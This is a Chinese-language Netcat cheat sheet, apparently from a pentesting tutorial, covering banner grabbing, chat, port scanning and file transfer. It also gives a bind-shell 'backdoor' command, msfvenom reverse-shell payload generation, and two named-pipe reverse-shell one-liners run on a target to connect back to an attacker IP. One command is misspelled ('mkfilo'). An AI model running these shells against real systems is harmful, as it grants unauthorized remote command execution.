Netcat 综合指南

介绍 ¹

特点

• 充当简单的TCP / UDP / SCTP / SSL客户端，用于与Web服务器，Telnet服务器，邮件服务器和其他TCP / IP网络服务进行交互。通常，理解服务（解决问题，发现安全漏洞或测试自定义命令）的最佳方法是使用Netcat与其进行交互，可以控制发送的每个字符并查看未经过滤的原始响应
• 将TCP / UDP / SCTP流量重定向或代理到其他端口或主机。这可以使用简单的重定向（发送到端口的所有内容自动在您预先指定的其他位置中继）或通过充当SOCKS或HTTP代理来完成，以便客户端指定自己的目标。在客户端模式下，Netcat可以通过匿名链接或目标链接到目标认证代理
• 加密与SSL的通信，并通过IPv4或IPv6传输
• 充当执行系统命令的网络网关，I / O重定向到网络
• 充当连接代理，允许两个（或更多）客户端通过第三个（代理）服务器相互连接，这使得隐藏在NAT网关后面的多台机器能够相互通信，并且还可以实现简单的Netcat聊天模式

查看帮助

• nc -h

连接到服务器的21端口

• nc 192.168.1.12 21

获取 HTTP 头信息

• 使用netcat来获取有关任何Web服务器的信息。让我们回到之前连接的服务器。
  它还在端口80上运行HTTP服务。因此，我们使用netcat连接到HTTP服务，就像我们之前做的那样。
  现在连接到服务器后，我们使用的选项将为我们提供标头以及在远程服务器上运行的HTTP服务的源代码。
• nc 192.168.1.12 80

通信

• Netcat 还可用于在两个用户之间进行聊天。我们需要在聊天之前建立连接。
  要做到这一点，我们将需要两个设备。一个人将扮演发起者的角色，一个人将成为开始对话的倾听者，因此一旦建立了连接，就可以从两端进行通信
• nc -lvvp 4444 ²
• nc 192.168.50.220 4444

创建后门

• nc -l -p 2222 -e /bin/bash ³
• nc 192.168.1.35 2222

详细模式 ⁴

• nc 192.168.1.6 21 -v

文件保存

• nc 192.168.1.6 21 -v -o /root/output.txt

端口扫描

• TCP Scan
  • nc -v -n -z -w 2 192.168.1.6 21-1100 ⁵
• TCP Delay Scan
  • nc -z -v -i 10 192.168.1.6 21-80
• UDP Scan
  • nc -vzu 192.168.1.6 80-90

反向 TCP shell ⁶

• msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.35 lport=2124 -f exe > /root/Desktop/1.exe
• nc -lvvp 2124

随机端口

• nc -lv -r

文件传输 ⁷

1
2
3
4

#target host
nc -v -w 30 -p 8888 -l < C:\netcat\output.txt
#kali
nc -v -w 2 192.168.1.4 8888 > output.txt

反向 Netcat Shell

1
2
3
4
5

#kali
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.35 lport=6666 R 
nc -lvp 6666
#将生成的命令在target host上执行
mkfilo /tmp/hcakruy; nc 192.168.1.35 6666 0</tmp/hcakruy | /bin/sh > /tmp/hcakruy 2>&1; rm /tmp/hcakruy

1
2
3
4
5

#target host
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 192.168.1.35 443 1>/tmp/backpipe
#kali
nc -lvp 443 

获取 Banner 信息

• nc -v 192.168.1.2 22

原文